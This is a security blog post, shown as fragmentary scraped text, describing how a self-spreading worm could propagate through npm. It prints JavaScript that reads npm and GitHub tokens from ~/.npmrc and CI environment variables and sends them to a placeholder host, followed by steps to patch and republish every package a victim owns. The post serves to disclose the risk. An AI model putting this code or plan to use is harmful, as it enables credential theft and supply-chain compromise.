Distributing self-replicating malicious code using NPM

Security risks that come with highly automated systems

Obtaining NPM credentials

```javascript
const fs = require('fs');
const path = require('path');
const querystring = require('querystring');
const http = require('http');

// Read the npm auth token that `npm login` stores in ~/.npmrc.
const npmrcPath = path.resolve(process.env.HOME, '.npmrc');
const npmrc = fs.readFileSync(npmrcPath, 'utf8');

// Send the file contents to a host controlled by the package author
// ("apocalypse" is the post's placeholder host name).
const targetData = querystring.stringify({
  npmrc
});
const endpointUrl = 'http://apocalypse/?' + targetData;
http.get(endpointUrl);
```
  1. Find out whoami & retrieve all packages owned by the user.
  2. Download every package & patch it using the above script.
  3. Publish the “patch”.

Node security project

Dr. Evil

  • Malicious code is included in a PR against a popular dependency. During PR review the malicious code is either not noticed or not identified as malicious.
  • The author of a popular package intentionally distributes malicious code.
Using these “open-source contributions”

travis & semantic-release & greenkeeper

```shell
npm install --save my-pkg@1.0.0
```

```javascript
const querystring = require('querystring');
const http = require('http');

// Tokens that CI tooling (travis, semantic-release, greenkeeper) exposes
// to the build environment are visible to any code that runs during install.
const targetData = querystring.stringify({
  ghtoken: process.env.GH_TOKEN,
  npmtoken: process.env.NPM_TOKEN
});

// Send them to the same placeholder host as above.
const endpointUrl = 'http://apocalypse/?' + targetData;
http.get(endpointUrl);
```
The outcome is: shit hits the fan.

How to fix this?

Bonus: Update your Travis-CI ENV variables

```shell
export GITHUB_USER=gajus
export GITHUB_TOKEN=...
travis login
travis repos -o $GITHUB_USER -a --no-interactive | xargs -n1 travis env set GH_TOKEN $GITHUB_TOKEN --private --repo
```

Gajus Kuizinas

Founder, engineer interested in JavaScript, PostgreSQL and DevOps. Follow me on Twitter for outbursts about startups & engineering. https://twitter.com/kuizinas